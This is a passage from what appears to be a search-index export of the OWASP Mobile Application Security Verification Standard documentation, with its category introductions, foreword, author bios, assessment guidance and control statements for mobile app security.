"},{"location":"MASVS/09-MASVS-PLATFORM/","title":"MASVS-PLATFORM: Platform Interaction","text":"The security of mobile apps heavily depends on their interaction with the mobile platform, which often involves exposing data or functionality intentionally through the use of platform-provided inter-process communication (IPC) mechanisms and WebViews to enhance the user experience. However, these mechanisms can also be exploited by attackers or other installed apps, potentially compromising the app's security.
Furthermore, sensitive data, such as passwords, credit card details, and one-time passwords in notifications, is often displayed in the app's user interface. It is essential to ensure that this data is not unintentionally leaked through platform mechanisms such as auto-generated screenshots or accidental disclosure through shoulder surfing or device sharing.
This category comprises controls that ensure the app's interactions with the mobile platform occur securely. These controls cover the secure use of platform-provided IPC mechanisms, WebView configurations to prevent sensitive data leakage and functionality exposure, and secure display of sensitive data in the app's user interface. By implementing these controls, mobile app developers can safeguard sensitive user information and prevent unauthorized access by attackers.
"},{"location":"MASVS/10-MASVS-CODE/","title":"MASVS-CODE: Code Quality","text":"Mobile apps have many data entry points, including the UI, IPC, network, and file system, which might receive data that has been inadvertently modified by untrusted actors. By treating this data as untrusted input and properly verifying and sanitizing it before use, developers can prevent classical injection attacks, such as SQL injection, XSS, or insecure deserialization. However, other common coding vulnerabilities, such as memory corruption flaws, are hard to detect in penetration testing but easy to prevent with secure architecture and coding practices. Developers should follow best practices such as the OWASP Software Assurance Maturity Model (SAMM) and NIST.SP.800-218 Secure Software Development Framework (SSDF) to avoid introducing these flaws in the first place.
This category covers coding vulnerabilities that arise from external sources such as app data entry points, the OS, and third-party software components. Developers should verify and sanitize all incoming data to prevent injection attacks and bypass of security checks. They should also enforce app updates and ensure that the app runs up-to-date platforms to protect users from known vulnerabilities.
"},{"location":"MASVS/11-MASVS-RESILIENCE/","title":"MASVS-RESILIENCE: Resilience Against Reverse Engineering and Tampering","text":"Defense-in-depth measures such as code obfuscation, anti-debugging, anti-tampering, etc. are important to increase app resilience against reverse engineering and specific client-side attacks. They add multiple layers of security controls to the app, making it more difficult for attackers to successfully reverse engineer and extract valuable intellectual property or sensitive data from it, which could result in:
The controls in this category aim to ensure that the app is running on a trusted platform, prevent tampering at runtime and ensure the integrity of the app's intended functionality. Additionally, the controls impede comprehension by making it difficult to figure out how the app works using static analysis and prevent dynamic analysis and instrumentation that could allow an attacker to modify the code at runtime.
However, note that the lack of any of these measures does not necessarily cause vulnerabilities - instead, they add threat-specific additional protection to apps which must also fulfil the rest of the OWASP MASVS security controls according to their specific threat models.
"},{"location":"MASVS/12-MASVS-PRIVACY/","title":"MASVS-PRIVACY: Privacy","text":"The main goal of MASVS-PRIVACY is to provide a baseline for user privacy. It is not intended to cover all aspects of user privacy, especially when other standards and regulations such as ENISA or the GDPR already do that. We focus on the app itself, looking at what can be tested using information that's publicly available or found within the app through methods like static or dynamic analysis.
While some associated tests can be automated, others necessitate manual intervention due to the nuanced nature of privacy. For example, if an app collects data that it didn't mention in the app store or its privacy policy, it takes careful manual checking to spot this.
Note on \"Data Collection and Sharing\":For the MASTG tests, we treat \"Collect\" and \"Share\" in a unified manner. This means that whether the app is sending data to another server or transferring it to another app on the device, we view it as data that's potentially leaving the user's control. Validating what happens to the data on remote endpoints is challenging and often not feasible due to access restrictions and the dynamic nature of server-side operations. Therefore, this issue is outside of the scope of the MASVS.
IMPORTANT DISCLAIMER:
MASVS-PRIVACY is not intended to serve as an exhaustive or exclusive reference. While it provides valuable guidance on app-centric privacy considerations, it should never replace comprehensive assessments, such as a Data Protection Impact Assessment (DPIA) mandated by the General Data Protection Regulation (GDPR) or other pertinent legal and regulatory frameworks. Stakeholders are strongly advised to undertake a holistic approach to privacy, integrating MASVS-PRIVACY insights with broader assessments to ensure comprehensive data protection compliance. Given the specialized nature of privacy regulations and the complexity of data protection, these assessments are best conducted by privacy experts rather than security experts.
"},{"location":"MASVS/CHANGELOG/","title":"Changelog","text":""},{"location":"MASVS/CHANGELOG/#v131-and-newer","title":"V1.3.1 and newer","text":"All our Changelogs are available online at the OWASP MASVS GitHub repository, see the Releases page.
"},{"location":"MASVS/CHANGELOG/#v13-13-may-2021","title":"V1.3 - 13 May 2021","text":"We are proud to announce the introduction of a new document build pipeline, which is a major milestone for our project. The build pipeline is based on Pandocker and Github Actions. This significantly reduces the time spent on creating new releases and will also be the foundation for the OWASP MSTG and will be made available for the OWASP ASVS project.
"},{"location":"MASVS/CHANGELOG/#changes","title":"Changes","text":"The following changes are part of release 1.2:
The following changes are part of pre-release 1.2:
The following changes are part of release 1.1.4:
The following changes are part of release 1.1.2:
The following changes are part of release 1.1:
The following changes are part of release 1.0:
Technological revolutions can happen quickly. Less than a decade ago, smartphones were clunky devices with little keyboards - expensive playthings for tech-savvy business users. Today, smartphones are an essential part of our lives. We've come to rely on them for information, navigation and communication, and they are ubiquitous both in business and in our social lives.
Every new technology introduces new security risks, and keeping up with those changes is one of the main challenges the security industry faces. The defensive side is always a few steps behind. For example, the default reflex for many was to apply old ways of doing things: Smartphones are like small computers, and mobile apps are just like classic software, so surely the security requirements are similar? But it doesn't work like that. Smartphone operating systems are different from desktop operating systems, and mobile apps are different from web apps. For example, the classical method of signature-based virus scanning doesn't make sense in modern mobile OS environments: Not only is it incompatible with the mobile app distribution model, it's also technically impossible due to sandboxing restrictions. Also, some vulnerability classes, such as buffer overflows and XSS issues, are less relevant in the context of run-of-the-mill mobile apps than in, say, desktop apps and web applications (exceptions apply).
Over time, our industry has gotten a better grip on the mobile threat landscape. As it turns out, mobile security is all about data protection: Apps store our personal information, pictures, recordings, notes, account data, business information, location and much more. They act as clients that connect us to services we use on a daily basis, and as communication hubs that process each and every message we exchange with others. Compromise a person's smartphone and you get unfiltered access to that person's life. When we consider that mobile devices are more readily lost or stolen and mobile malware is on the rise, the need for data protection becomes even more apparent.
A security standard for mobile apps must therefore focus on how mobile apps handle, store and protect sensitive information. Even though modern mobile operating systems like iOS and Android offer mature APIs for secure data storage and communication, those have to be implemented and used correctly in order to be effective. Data storage, inter-app communication, proper usage of cryptographic APIs and secure network communication are only some of the aspects that require careful consideration.
An important question in need of industry consensus is how far exactly one should go in protecting the confidentiality and integrity of data. For example, most of us would agree that a mobile app should verify the server certificate in a TLS exchange. But what about certificate or public key pinning? Does not doing it result in a vulnerability? Should this be a requirement if an app handles sensitive data, or is it maybe even counter-productive? Do we need to encrypt data stored in SQLite databases, even though the OS sandboxes the app? What is appropriate for one app might be unrealistic for another. The MASVS is an attempt to standardize these requirements using profiles that fit different threat scenarios.
Furthermore, the appearance of root malware and remote administration tools has created awareness of the fact that mobile operating systems themselves have exploitable flaws, so containerization strategies are increasingly used to afford additional protection to sensitive data and prevent client-side tampering. This is where things get complicated. Hardware-backed security features and OS-level containerization solutions, such as Android Enterprise and Samsung Knox, do exist, but they aren't consistently available across different devices. As a band-aid, it is possible to implement software-based protection measures - but unfortunately, there are no standards or testing processes for verifying these kinds of protections.
As a result, mobile app security testing reports are all over the place: For example, some testers report a lack of obfuscation or root detection in an Android app as \u201csecurity flaw\u201d. On the other hand, measures like string encryption, debugger detection or control flow obfuscation aren't considered mandatory. However, this binary way of looking at things doesn't make sense because resilience is not a binary proposition: It depends on the particular client-side threats one aims to defend against. Software protections are not useless, but they can ultimately be bypassed, so they must never be used as a replacement for security controls.
The overall goal of the MASVS is to offer a baseline for mobile application security, while also allowing for the inclusion of defense-in-depth measures and protections against client-side threats. The MASVS is meant to achieve the following:
We are aware that 100% industry consensus is impossible to achieve. Nevertheless, we hope that the MASVS is useful in providing guidance throughout all phases of mobile app development and testing. As an open source standard, the MASVS will evolve over time, and we welcome any contributions and suggestions.
By Bernhard Mueller
"},{"location":"MASVS/Intro/02-Frontispiece/","title":"About the Standard","text":"The OWASP Mobile Application Security Verification Standard (MASVS) is the industry standard for mobile application security. It provides a comprehensive set of security controls that can be used to assess the security of mobile apps across various platforms (e.g., Android, iOS) and deployment scenarios (e.g., consumer, enterprise). The standard covers the key components of the mobile app attack surface including storage, cryptography, authentication and authorization, network communication, interaction with the mobile platform, code quality and resilience against reverse engineering and tampering.
The OWASP MASVS is the result of years of community effort and industry feedback. We thank all the contributors who have helped shape this standard. We welcome your feedback on the OWASP MASVS at any time, especially as you apply it to your own organization and mobile app development projects. Getting inputs from a variety of mobile app developers will help us improve and update the standard which is revised periodically based on your inputs and feedback.
You can provide feedback using GitHub Discussions in the OWASP MASVS repo https://github.com/OWASP/owasp-masvs/discussions, or contact the project leads directly https://mas.owasp.org/contact/.
The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"MASVS/Intro/02-Frontispiece/#authors","title":"Authors","text":""},{"location":"MASVS/Intro/02-Frontispiece/#sven-schleier","title":"Sven Schleier","text":"
Sven is specialised in penetration testing and application security and has guided numerous projects to build security in from the start. He strongly believes in knowledge sharing and is speaking worldwide at meetups and conferences, is an adjunct professor and is conducting hands-on workshops about mobile app security to penetration testers, developers and students.
"},{"location":"MASVS/Intro/02-Frontispiece/#carlos-holguera","title":"Carlos Holguera","text":"Carlos is a mobile security research engineer with many years of hands-on experience in security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"MASVS/Intro/02-Frontispiece/#jeroen-beckers","title":"Jeroen Beckers","text":"Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
"},{"location":"MASVS/Intro/02-Frontispiece/#bernhard-mueller","title":"Bernhard Mueller","text":"Bernhard is a cyber security specialist with a talent for hacking systems of all kinds. During more than a decade in the industry, he has published many zero-day exploits for software. BlackHat USA commended his pioneering work in mobile security with a Pwnie Award for Best Research.
"},{"location":"MASVS/Intro/02-Frontispiece/#jeroen-willemsen","title":"Jeroen Willemsen","text":"Jeroen is a principal security architect with a passion for mobile security and risk management. He has supported companies as a security coach, a security engineer and as a full-stack developer. He loves explaining technical subjects: from security issues to programming challenges.
"},{"location":"MASVS/Intro/02-Frontispiece/#contributors","title":"Contributors","text":"All of our contributors are listed in the Contributing section of the OWASP MAS website:
https://mas.owasp.org/contributing/
"},{"location":"MASVS/Intro/02-Frontispiece/#donators","title":"Donators","text":"While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes outside help is required. We therefore thank our donators for providing the funds to be able to hire technical editors. Note that their donation does not influence the content of the MASVS or MASTG in any way. The Donation Packages are described on the OWASP MAS Website.
"},{"location":"MASVS/Intro/02-Frontispiece/#changelog","title":"Changelog","text":"All our Changelogs are available online at the OWASP MASVS GitHub repository, see the Releases page:
https://github.com/OWASP/owasp-masvs/releases
"},{"location":"MASVS/Intro/02-Frontispiece/#copyright-and-license","title":"Copyright and License","text":"Copyright \u00a9 The OWASP Foundation. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. For any reuse or distribution, you must make clear to others the license terms of this work.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/","title":"The Mobile Application Security Verification Standard","text":"The Mobile Application Security Verification Standard (MASVS) is a comprehensive security standard developed by the Open Worldwide Application Security Project (OWASP). This framework provides a clear and concise set of guidelines and best practices for assessing and enhancing the security of mobile applications. The MASVS is designed to be used as a metric, guidance, and baseline for mobile app security verification, serving as a valuable resource for developers, application owners, and security professionals.
The objective of the MASVS is to establish a high level of confidence in the security of mobile apps by providing a set of controls that address the most common mobile application security issues. These controls were developed with a focus on providing guidance during all phases of mobile app development and testing, and to be used as a baseline for mobile app security verification during procurement.
By adhering to the controls outlined in the OWASP MASVS, organizations can ensure that their mobile applications are built with security in mind, reducing the risk of security breaches and protecting sensitive user data. Whether used as a metric, guidance, or baseline, the OWASP MASVS is an invaluable tool for enhancing the security of mobile applications.
The OWASP MASVS is a living document and is regularly updated to reflect the changing threat landscape and new attack vectors. As such, it's important to stay up-to-date with the latest version of the standard and adapt security measures accordingly.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#mobile-application-security-model","title":"Mobile Application Security Model","text":"The standard is divided into various groups that represent the most critical areas of the mobile attack surface. These control groups, labeled MASVS-XXXXX, provide guidance and standards for the following areas:
Each of these control groups contains individual controls labeled MASVS-XXXXX-Y, which provide specific guidance on the particular security measures that need to be implemented to meet the standard.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#mas-testing-profiles","title":"MAS Testing Profiles","text":"The MAS project has traditionally provided three verification levels (L1, L2 and R), which were revisited during the MASVS refactoring in 2023, and have been reworked as \"MAS Testing Profiles\" and moved over to the OWASP MASTG. These profiles are now aligned with the NIST OSCAL (Open Security Controls Assessment Language) standard, which is a comprehensive catalog of security controls that can be used to secure information systems.
By aligning with OSCAL, the MASVS provides a more flexible and comprehensive approach to security testing. OSCAL provides a standard format for security control information, which allows for easier sharing and reuse of security controls across different systems and organizations. This allows for a more efficient use of resources and a more targeted approach to mobile app security testing.
However, it is important to note that implementing these profiles fully or partially should be a risk-based decision made in consultation with business owners. The profiles should be tailored to the specific security risks and requirements of the mobile application being developed, and any deviations from the recommended controls should be carefully justified and documented.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#assumptions","title":"Assumptions","text":"When using the MASVS, it's important to keep in mind the following assumptions:
While the OWASP MASVS is an invaluable tool for enhancing the security of mobile applications, it cannot guarantee absolute security. It should be used as a baseline for security requirements, but additional security measures should also be implemented as appropriate to address specific risks and threats to the mobile app.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#security-architecture-design-and-threat-modeling-for-mobile-apps","title":"Security Architecture, Design and Threat Modeling for Mobile Apps","text":"The OWASP MASVS assumes that best practices for secure architecture, design, and threat modeling have been followed as a foundation.
Security must be a top priority throughout all stages of mobile app development, from the initial planning and design phase to deployment and ongoing maintenance. Developers need to follow secure development best practices and ensure that security measures are prioritized to protect sensitive data, comply with policies and regulations, and identify and address security issues that can be targeted by attackers.
While the MASVS and MASTG focus on controls and technical test cases for app security assessments, non-technical aspects such as following best practices laid out by OWASP Software Assurance Maturity Model (SAMM) or NIST.SP.800-218 Secure Software Development Framework (SSDF) for secure architecture, design, and threat modeling are still important. The MASVS can also be used as a reference and input for a threat model to raise awareness of potential attacks.
To ensure that these practices are followed, developers can provide documentation or evidence of adherence to these standards, such as design documents, threat models, and security architecture diagrams. Additionally, interviews can be conducted to collect information on adherence to these practices and provide an understanding of the level of compliance with these standards.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#secure-app-ecosystem","title":"Secure App Ecosystem","text":"The OWASP MASVS assumes other relevant security standards are also leveraged to ensure that all systems involved in the app's operation meet their applicable requirements.
Mobile apps often interact with multiple systems, including backend servers, third-party APIs, Bluetooth devices, cars, IoT devices, and more. Each of these systems may introduce their own security risks that must be considered as part of the mobile app's security design and threat modeling. For example, when interacting with a backend server, the OWASP Application Security Verification Standard (ASVS) should be used to ensure that the server is secure and meets the required security standards. In the case of Bluetooth devices, the app should be designed to prevent unauthorized access, while for cars, the app should be designed to protect the user's data and ensure that there are no safety issues with the car's operation.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#security-knowledge-and-expertise","title":"Security Knowledge and Expertise","text":"The OWASP MASVS assumes a certain level of security knowledge and expertise among developers and security professionals using the standard. It's important to have a good understanding of mobile app security concepts, as well as the relevant tools and techniques used for mobile app security testing and assessment. To support this, the OWASP MAS project also provides the OWASP Mobile Application Security Testing Guide (MASTG), which provides in-depth guidance on mobile app security testing and assessment.
Mobile app development is a rapidly evolving field, with new technologies, programming languages, and frameworks constantly emerging. It's essential for developers and security professionals to stay current with these developments, as well as to have a solid foundation in fundamental security principles.
OWASP SAMM provides a dedicated \"Education & Guidance\" domain which aims to ensure that all stakeholders involved in the software development lifecycle are aware of the software security risks and are equipped with the knowledge and skills to mitigate these risks. This includes developers, testers, architects, project managers, executives, and other personnel involved in software development and deployment.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#applicability-of-the-masvs","title":"Applicability of the MASVS","text":"By adhering to the MASVS, businesses and developers can ensure that their mobile apps are secure and meet industry-standard security requirements, regardless of the development approach used. This is the case for downloadable apps, as the project was traditionally focused on, but the MAS resources and guidelines are also applicable to other areas of the business such as preloaded applications and SDKs.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#native-apps","title":"Native Apps","text":"Native apps are written in platform-specific languages, such as Java/Kotlin for Android or Objective-C/Swift for iOS.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#cross-platform-and-hybrid-apps","title":"Cross-Platform and Hybrid Apps","text":"Apps based on cross-platform (Flutter, React Native, Xamarin, Ionic, etc.) and hybrid (Cordova, PhoneGap, Framework7, Onsen UI, etc.) frameworks may be susceptible to platform-specific vulnerabilities that don't exist in native apps. For example, some JavaScript frameworks may introduce new security issues that don't exist in other programming languages. It is therefore essential to follow the security best practices of the used frameworks.
The MASVS is agnostic to the type of mobile application being developed. This means that the guidelines and best practices outlined in the MASVS can be applied to all types of mobile apps, including cross-platform and hybrid apps.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#preloads","title":"Preloads","text":"Preloaded apps are apps that are installed on a user's device at factory time and may have elevated privileges that leave users vulnerable to exploitative business practices. Given the large number of preloaded apps on an average user's device, it's important to measure their risk in a quantifiable way.
There are hundreds of preloads that may ship on a device, and as a result, automation is critical. A subset of MAS criteria that is automation-friendly may be a good basis.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#sdks","title":"SDKs","text":"SDKs play a vital role in the mobile app value chain, supplying code developers need to build faster, smarter, and more profitably. Developers rely on them heavily, with the average mobile app using 30 SDKs, and 90% of code sourced from third parties. While this widespread use delivers significant benefits to developers, it also propagates safety and security issues.
SDKs offer a variety of functionality, and should be regarded as an individual project. You should evaluate how the MASVS applies to the used SDKs to ensure the highest possible security testing coverage.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/","title":"Assessment and Certification","text":""},{"location":"MASVS/Intro/04-Assessment_and_Certification/#owasps-stance-on-masvs-certifications-and-trust-marks","title":"OWASP's Stance on MASVS Certifications and Trust Marks","text":"OWASP, as a vendor-neutral not-for-profit organization, does not certify any vendors, verifiers or software.
All such assurance assertions, trust marks, or certifications are not officially vetted, registered, or certified by OWASP, so an organization relying upon such a view needs to be cautious of the trust placed in any third party or trust mark claiming (M)ASVS certification.
This should not inhibit organizations from offering such assurance services, as long as they do not claim official OWASP certification.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#guidance-for-certifying-mobile-apps","title":"Guidance for Certifying Mobile Apps","text":"The recommended way of verifying compliance of a mobile app with the MASVS is by performing an \"open book\" review, meaning that the testers are granted access to key resources such as architects and developers of the app, project documentation, source code, and authenticated access to endpoints, including access to at least one user account for each role.
It is important to note that the MASVS only covers the security of the mobile app (client-side). It does not contain specific controls for the remote endpoints (e.g. web services) associated with the app and they should be verified against appropriate standards, such as the OWASP ASVS.
A certifying organization must include in any report the scope of the verification (particularly if a key component is out of scope), a summary of verification findings, including passed and failed tests, with clear indications of how to resolve the failed tests. Keeping detailed work papers, screenshots or recordings, scripts to reliably and repeatedly exploit an issue, and electronic records of testing, such as intercepting proxy logs and associated notes such as a cleanup list, is considered standard industry practice. It is not sufficient to simply run a tool and report on the failures; this does not provide sufficient evidence that all issues at a certifying level have been tested and tested thoroughly. In case of dispute, there should be sufficient supportive evidence to demonstrate that every verified control has indeed been tested.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#using-the-owasp-mobile-application-security-testing-guide-mastg","title":"Using the OWASP Mobile Application Security Testing Guide (MASTG)","text":"The OWASP MASTG is a manual for testing the security of mobile apps. It describes the technical processes for verifying the controls listed in the MASVS. The MASTG includes a list of test cases, each of which map to a control in the MASVS. While the MASVS controls are high-level and generic, the MASTG provides in-depth recommendations and testing procedures on a per-mobile-OS basis.
Testing the app's remote endpoints is not covered in the MASTG. For example:
The use of source code scanners and black-box testing tools is encouraged in order to increase efficiency whenever possible. It is however not possible to complete MASVS verification using automated tools alone, since every mobile app is different. In order to fully verify the security of the app it is essential to understand the overall architecture, business logic, and technical pitfalls of the specific technologies and frameworks being used.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#other-uses","title":"Other Uses","text":""},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-detailed-security-architecture-guidance","title":"As Detailed Security Architecture Guidance","text":"One of the more common uses for the Mobile Application Security Verification Standard is as a resource for security architects. The two major security architecture frameworks, SABSA or TOGAF, are missing a great deal of information that is necessary to complete mobile application security architecture reviews. MASVS can be used to fill in those gaps by allowing security architects to choose better controls for issues common to mobile apps.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-replacement-for-off-the-shelf-secure-coding-checklists","title":"As a Replacement for Off-the-shelf Secure Coding Checklists","text":"Many organizations can benefit from adopting the MASVS, by choosing one of the two levels, or by forking MASVS and changing what is required for each application's risk level in a domain-specific way. We encourage this type of forking as long as traceability is maintained, so that if an app has passed control 4.1, this means the same thing for forked copies as the standard evolves.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-basis-for-security-testing-methodologies","title":"As a Basis for Security Testing Methodologies","text":"A good mobile app security testing methodology should cover all controls listed in the MASVS. The OWASP Mobile Application Security Testing Guide (MASTG) describes black-box and white-box test cases for each verification control.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-guide-for-automated-unit-and-integration-tests","title":"As a Guide for Automated Unit and Integration Tests","text":"The MASVS is designed to be highly testable, with the sole exception of architectural controls. Automated unit, integration and acceptance testing based on the MASVS controls can be integrated in the continuous development lifecycle. This not only increases developer security awareness, but also improves the overall quality of the resulting apps, and reduces the amount of findings during security testing in the pre-release phase.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#for-secure-development-training","title":"For Secure Development Training","text":"MASVS can also be used to define characteristics of secure mobile apps. Many \"secure coding\" courses are simply ethical hacking courses with a light smear of coding tips. This does not help developers. Instead, secure development courses can use the MASVS, with a strong focus on the proactive controls documented in the MASVS, rather than e.g. the Top 10 code security issues.
"},{"location":"MASVS/controls/MASVS-AUTH-1/","title":"MASVS-AUTH-1","text":"The app uses secure authentication and authorization protocols and follows the relevant best practices.
Most apps connecting to a remote endpoint require user authentication and also enforce some kind of authorization. While the enforcement of these mechanisms must be on the remote endpoint, the apps also have to ensure that it follows all the relevant best practices to ensure a secure use of the involved protocols.
"},{"location":"MASVS/controls/MASVS-AUTH-2/","title":"MASVS-AUTH-2","text":"The app performs local authentication securely according to the platform best practices.
Many apps allow users to authenticate via biometrics or a local PIN code. These authentication mechanisms need to be correctly implemented. Additionally, some apps might not have a remote endpoint, and rely fully on local app authentication.
"},{"location":"MASVS/controls/MASVS-AUTH-3/","title":"MASVS-AUTH-3","text":"The app secures sensitive operations with additional authentication.
Some additional form of authentication is often desirable for sensitive actions inside the app. This can be done in different ways (biometric, pin, MFA code generator, email, deep links, etc) and they all need to be implemented securely.
"},{"location":"MASVS/controls/MASVS-CODE-1/","title":"MASVS-CODE-1","text":"The app requires an up-to-date platform version.
Every release of the mobile OS includes security patches and new security features. By supporting older versions, apps stay vulnerable to well-known threats. This control ensures that the app is running on an up-to-date platform version so that users have the latest security protections.
"},{"location":"MASVS/controls/MASVS-CODE-2/","title":"MASVS-CODE-2","text":"The app has a mechanism for enforcing app updates.
Sometimes critical vulnerabilities are discovered in the app when it is already in production. This control ensures that there is a mechanism to force the users to update the app before they can continue using it.
"},{"location":"MASVS/controls/MASVS-CODE-3/","title":"MASVS-CODE-3","text":"The app only uses software components without known vulnerabilities.
To be truly secure, a full whitebox assessment should have been performed on all app components. However, as usually happens with e.g. third-party components, this is not always feasible and not typically part of a penetration test. This control covers \"low-hanging fruit\" cases, such as those that can be detected just by scanning libraries for known vulnerabilities.
"},{"location":"MASVS/controls/MASVS-CODE-4/","title":"MASVS-CODE-4","text":"The app validates and sanitizes all untrusted inputs.
Apps have many data entry points including the UI, IPC, the network, the file system, etc. This incoming data might have been inadvertently modified by untrusted actors and may lead to bypass of critical security checks as well as classical injection attacks such as SQL injection, XSS or insecure deserialization. This control ensures that this data is treated as untrusted input and is properly verified and sanitized before it's used.
"},{"location":"MASVS/controls/MASVS-CRYPTO-1/","title":"MASVS-CRYPTO-1","text":"The app employs current strong cryptography and uses it according to industry best practices.
Cryptography plays an especially important role in securing the user's data - even more so in a mobile environment, where attackers having physical access to the user's device is a likely scenario. This control covers general cryptography best practices, which are typically defined in external standards.
"},{"location":"MASVS/controls/MASVS-CRYPTO-2/","title":"MASVS-CRYPTO-2","text":"The app performs key management according to industry best practices.
Even the strongest cryptography would be compromised by poor key management. This control covers the management of cryptographic keys throughout their lifecycle, including key generation, storage and protection.
"},{"location":"MASVS/controls/MASVS-NETWORK-1/","title":"MASVS-NETWORK-1","text":"The app secures all network traffic according to the current best practices.
Ensuring data privacy and integrity of any data in transit is critical for any app that communicates over the network. This is typically done by encrypting data and authenticating the remote endpoint, as TLS does. However, there are many ways for a developer to disable the platform secure defaults, or bypass them completely by using low-level APIs or third-party libraries. This control ensures that the app is in fact setting up secure connections in any situation.
"},{"location":"MASVS/controls/MASVS-NETWORK-2/","title":"MASVS-NETWORK-2","text":"The app performs identity pinning for all remote endpoints under the developer's control.
Instead of trusting all the default root CAs of the framework or device, this control will make sure that only very specific CAs are trusted. This practice is typically called certificate pinning or public key pinning.
"},{"location":"MASVS/controls/MASVS-PLATFORM-1/","title":"MASVS-PLATFORM-1","text":"The app uses IPC mechanisms securely.
Apps typically use platform provided IPC mechanisms to intentionally expose data or functionality. Both installed apps and the user are able to interact with the app in many different ways. This control ensures that all interactions involving IPC mechanisms happen securely.
"},{"location":"MASVS/controls/MASVS-PLATFORM-2/","title":"MASVS-PLATFORM-2","text":"The app uses WebViews securely.
WebViews are typically used by apps that have a need for increased control over the UI. This control ensures that WebViews are configured securely to prevent sensitive data leakage as well as sensitive functionality exposure (e.g. via JavaScript bridges to native code).
"},{"location":"MASVS/controls/MASVS-PLATFORM-3/","title":"MASVS-PLATFORM-3","text":"The app uses the user interface securely.
Sensitive data has to be displayed in the UI in many situations (e.g. passwords, credit card details, OTP codes in notifications). This control ensures that this data doesn't end up being unintentionally leaked due to platform mechanisms such as auto-generated screenshots or accidentally disclosed via e.g. shoulder surfing or sharing the device with another person.
"},{"location":"MASVS/controls/MASVS-PRIVACY-1/","title":"MASVS-PRIVACY-1","text":"The app minimizes access to sensitive data and resources.
Apps should only request access to the data they absolutely need for their functionality and always with informed consent from the user. This control ensures that apps practice data minimization and restricts access control, reducing the potential impact of data breaches or leaks.
Furthermore, apps should share data with third parties only when necessary, and this should include enforcing that third-party SDKs operate based on user consent, not by default or without it. Apps should prevent third-party SDKs from ignoring consent signals or from collecting data before consent is confirmed.
Additionally, apps should be aware of the 'supply chain' of SDKs they incorporate, ensuring that no data is unnecessarily passed down their chain of dependencies. This end-to-end responsibility for data aligns with recent SBOM regulatory requirements, making apps more accountable for their data practices.
"},{"location":"MASVS/controls/MASVS-PRIVACY-2/","title":"MASVS-PRIVACY-2","text":"The app prevents identification of the user.
Protecting user identity is crucial. This control emphasizes the use of unlinkability techniques like data abstraction, anonymization and pseudonymization to prevent user identification and tracking.
Another key aspect addressed by this control is to establish technical barriers when employing complex 'fingerprint-like' signals (e.g. device IDs, IP addresses, behavioral patterns) for specific purposes. For instance, a fingerprint used for fraud detection should be isolated and not repurposed for audience measurement in an analytics SDK. This ensures that each data stream serves its intended function without risking user privacy.
"},{"location":"MASVS/controls/MASVS-PRIVACY-3/","title":"MASVS-PRIVACY-3","text":"The app is transparent about data collection and usage.
Users have the right to know how their data is being used. This control ensures that apps provide clear information about data collection, storage, and sharing practices, including any behavior a user wouldn't reasonably expect, such as background data collection. Apps should also adhere to platform guidelines on data declarations.
"},{"location":"MASVS/controls/MASVS-PRIVACY-4/","title":"MASVS-PRIVACY-4","text":"The app offers user control over their data.
Users should have control over their data. This control ensures that apps provide mechanisms for users to manage, delete, and modify their data, and change privacy settings as needed (e.g. to revoke consent). Additionally, apps should re-prompt for consent and update their transparency disclosures when they require more data than initially specified.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-1/","title":"MASVS-RESILIENCE-1","text":"The app validates the integrity of the platform.
Running on a platform that has been tampered with can be very dangerous for apps, as this may disable certain security features, putting the data of the app at risk. Trusting the platform is essential for many of the MASVS controls relying on the platform being secure (e.g. secure storage, biometrics, sandboxing, etc.). This control tries to validate that the OS has not been compromised and its security features can thus be trusted.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-2/","title":"MASVS-RESILIENCE-2","text":"The app implements anti-tampering mechanisms.
Apps run on a user-controlled device, and without proper protections it's relatively easy to run a modified version locally (e.g. to cheat in a game, or enable premium features without paying), or upload a backdoored version of it to third-party app stores. This control tries to ensure the integrity of the app's intended functionality by preventing modifications to the original code and resources.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-3/","title":"MASVS-RESILIENCE-3","text":"The app implements anti-static analysis mechanisms.
Understanding the internals of an app is typically the first step towards tampering with it (either dynamically, or statically). This control tries to impede comprehension by making it as difficult as possible to figure out how an app works using static analysis.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-4/","title":"MASVS-RESILIENCE-4","text":"The app implements anti-dynamic analysis techniques.
Sometimes pure static analysis is very difficult and time consuming so it typically goes hand in hand with dynamic analysis. Observing and manipulating an app during runtime makes it much easier to decipher its behavior. This control aims to make it as difficult as possible to perform dynamic analysis, as well as prevent dynamic instrumentation which could allow an attacker to modify the code at runtime.
"},{"location":"MASVS/controls/MASVS-STORAGE-1/","title":"MASVS-STORAGE-1","text":"The app securely stores sensitive data.
